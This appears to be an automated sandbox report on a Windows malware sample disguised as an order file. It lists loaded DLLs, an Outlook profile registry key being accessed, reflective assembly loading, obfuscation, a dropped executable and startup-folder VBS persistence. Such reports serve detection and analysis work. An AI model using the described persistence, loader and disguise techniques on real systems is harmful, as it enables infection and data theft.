Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: NEW FRANCE ORDER.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: NEW FRANCE ORDER.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: NEW FRANCE ORDER.exe Static file information: File size 1226752 > 1048576
Source: NEW FRANCE ORDER.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x12ae00
Source: NEW FRANCE ORDER.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1303196281.00000000066C0000.00000004.08000000.00040000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.00000000046E4000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.0000000003F7C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1303196281.00000000066C0000.00000004.08000000.00040000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.00000000046E4000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.0000000003F7C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: NEW FRANCE ORDER.exe, 00000000.00000002.1302840709.0000000006670000.00000004.08000000.00040000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.000000000467E000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: NEW FRANCE ORDER.exe, 00000000.00000002.1302840709.0000000006670000.00000004.08000000.00040000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.000000000467E000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: NEW FRANCE ORDER.exe, -.cs .Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: NEW FRANCE ORDER.exe, -.cs .Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: IsSingleByte.exe.0.dr, -.cs .Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: IsSingleByte.exe.0.dr, -.cs .Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 0.2.NEW FRANCE ORDER.exe.4457d70.3.raw.unpack, -.cs .Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 0.2.NEW FRANCE ORDER.exe.4457d70.3.raw.unpack, -.cs .Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 0.2.NEW FRANCE ORDER.exe.66c0000.10.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 0.2.NEW FRANCE ORDER.exe.66c0000.10.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 0.2.NEW FRANCE ORDER.exe.66c0000.10.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
Source: 0.2.NEW FRANCE ORDER.exe.467e250.2.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
Source: 0.2.NEW FRANCE ORDER.exe.467e250.2.raw.unpack, ListDecorator.cs .Net Code: Read
Source: 0.2.NEW FRANCE ORDER.exe.467e250.2.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
Source: 0.2.NEW FRANCE ORDER.exe.467e250.2.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
Source: 0.2.NEW FRANCE ORDER.exe.467e250.2.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
Yara detected Costura Assembly Loader
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.6540000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.6540000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.1523800985.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1301642824.0000000006540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1290556972.0000000003401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: NEW FRANCE ORDER.exe PID: 7812, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: IsSingleByte.exe PID: 4508, type: MEMORYSTR
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_06473083 pushfd ; retf 0_2_06473085
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_06472F83 push esp; retf 0_2_06472F85
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_064ADE91 pushad ; iretd 0_2_064ADE95
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_064AF441 push es; ret 0_2_064AF450
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_064ABC01 push es; iretd 0_2_064ABC24
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_064ABB7D push es; iretd 0_2_064ABBB4
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_064A5308 push E8FFFFFCh; iretd 0_2_064A530D
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_064ABBDD push es; iretd 0_2_064ABBB4
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_064ACBEC push esi; retf 0013h 0_2_064ACBEF
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_064A70CD push es; ret 0_2_064A70D0
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_064A10F8 push edi; retf 0_2_064A1116
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_064A092C push es; ret 0_2_064A0978
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_064AD9D2 push es; ret 0_2_064AD9E4
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_065E5E6D push es; ret 0_2_065E5E74
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_065E6F6D push es; retf 0_2_065E6F70
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_065E5C92 push es; retf 0_2_065E5CB0
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_065E35ED push ebx; retf 0_2_065E35F4
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_065EC98A push ebp; ret 0_2_065EC991
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_065F62C7 push es; iretd 0_2_065F62D0
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_065F98A8 push es; iretd 0_2_065F98B0
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_0660A670 push es; ret 0_2_0660A680
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_06663666 push eax; iretd 0_2_06663667
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_0666B23E push edi; retf 006Ch 0_2_0666B23F
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_0666D2E0 push es; ret 0_2_0666D390
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_06973DF6 push ss; ret 0_2_06973DFD
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_06976507 push ecx; iretd 0_2_0697650C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_01506EC2 push es; ret 7_2_01506ED0
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_0590AD70 pushfd ; iretd 10_2_0590AD7D
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_0590BF28 pushad ; ret 10_2_0590BF35
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_05FB2F88 pushfd ; retf 10_2_05FB3085
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_05FB2F86 pushfd ; retf 10_2_05FB3085
Source: NEW FRANCE ORDER.exe Static PE information: section name: .text entropy: 7.927442113182449
Source: IsSingleByte.exe.0.dr Static PE information: section name: .text entropy: 7.927442113182449
Drops PE files
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe File created: C:\Users\user\AppData\Roaming\IsSingleByte.exe Jump to dropped file

Boot Survival
barindex
Drops VBS files to the startup folder
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsSingleByte.vbs Jump to dropped file
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsSingleByte.vbs Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsSingleByte.vbs Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
